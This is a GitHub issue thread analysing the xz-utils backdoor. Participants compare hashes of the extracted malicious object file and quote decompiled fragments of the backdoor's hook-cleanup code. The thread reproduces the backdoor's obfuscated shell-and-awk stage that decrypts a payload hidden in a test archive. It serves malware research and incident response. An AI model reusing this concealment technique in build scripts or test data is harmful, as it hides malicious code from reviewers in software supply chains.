### ISSUE TITLE
The extracted `liblzma_la-crc64-fast.o` is different 

### ISSUE THREAD

**Issue by Chestnuts4** [binarly-io/binary-risk-intelligence#1]
hey folks, I extracted `liblzma_la-crc64-fast.o` manually using the script below from `good-large_compressed.lzma` from `xz-5.6.1`
```shell
N=0
W=88664
top_srcdir=.
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";
xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true

```

this is bindiff output between `liblzma_la-crc64-fast.o` and [cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537](https://www.virustotal.com/gui/file/cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537/community)

![image](https://github.com/binarly-io/binary-risk-intelligence/assets/116432652/3e5e8d03-97ce-4a71-b7cf-2931841b0332)

The _Llzma_block_param_decoder_0 function is missing in my extracted `liblzma_la-crc64-fast.o`

![image](https://github.com/binarly-io/binary-risk-intelligence/assets/116432652/e4bb8d3b-060e-4bb7-a93c-ee821cf13ea9)

Can you tell me how you extracted the `liblzma_la-crc64-fast.o`  from  `good-large_compressed.lzma`

**Comment by yeggor** [comment]
Hi, sorry that we didn't specify this in the report, but all the addresses in the report should match the object file attached in the original message (https://www.openwall.com/lists/oss-security/2024/03/29/4) which is actually generated from `good-large_compressed.lzma` `v5.6.0` (you can generate it the same way you did for 5.6.1, but using `W=88792` instead of `W=88664` and `l=0;l<4096;l++` instead of `l=0;l<8192;l++`).

In result we should have:

| SHA256 | Version |
| --- | --- |
| cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537 | 5.6.0 |
| b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963 | 5.6.1 |

The differences in these files are insignificant and do not affect the basic functionality. That's why we used the latest version of the library for debugging (so we specified a hash for it, which caused confusion).

As for `_Llzma_block_param_decoder_0` - this is the function that is called at the very end of `bd_install_it_all`:

```c
  bd_hook = input->hook_ctx;
_exit:
  clear_stack(bd_hook, status);
  bd_hook->static_label = 1LL;
  bd_hook->runtime_offset = 0LL;
  bd_hook->result_ptr = 0LL;
  bd_hook->cpuid_ptr = 0LL;
  bd_hook->runtime_label = 0LL;
  _RAX = 0LL;
  __asm { cpuid }
  if ( _RAX )
  {
    _RAX = 1LL;
    __asm { cpuid }
    LODWORD(bd_hook->runtime_offset) = _RAX;
    LODWORD(bd_hook->result_ptr) = _RBX;
    LODWORD(bd_hook->cpuid_ptr) = _RCX;
    LODWORD(bd_hook->runtime_label) = _RDX;
  }
  return 0LL;
}
```

```c
size_t __fastcall clear_stack(bd_hook_ctx *hook_ctx, int status)
{
  uint64_t *p_local; // rdx
  size_t index; // rax
  char local; // [rsp+0h] [rbp-8h] BYREF

  p_local = &local;
  LODWORD(index) = 0;
  do
  {
    index = (index + 1);
    --p_local;
    p_local[1] = 0LL;
  }
  while ( (status == 0 ? 128 : 4072) != index );
  return index;
}
```

It was removed in the next version of the backdoor:

```c
_exit:
  bd_hook = input->hook_ctx;
  bd_hook->runtime_offset = 0LL;
  bd_hook->result_ptr = 0LL;
  bd_hook->cpuid_ptr = 0LL;
  bd_hook->runtime_label = 0LL;
  _RAX = 0LL;
  bd_hook->static_label = 1LL;
  __asm { cpuid }
  if ( _RAX )
  {
    _RAX = 1LL;
    __asm { cpuid }
    LODWORD(bd_hook->runtime_offset) = _RAX;
    LODWORD(bd_hook->result_ptr) = _RBX;
    LODWORD(bd_hook->cpuid_ptr) = _RCX;
    LODWORD(bd_hook->runtime_label) = _RDX;
  }
  return 0LL;
}
```

**Comment by Chestnuts4** [comment]
thanks for you reply, and one more question, how did you reverse the data structure in the backdoor, any idea.

**Comment by yeggor** [comment]
we did the static analysis manually in IDA Pro. ~50 data structures were created as a result, but in the report we have listed only a few of them that have an impact on understanding the analysis
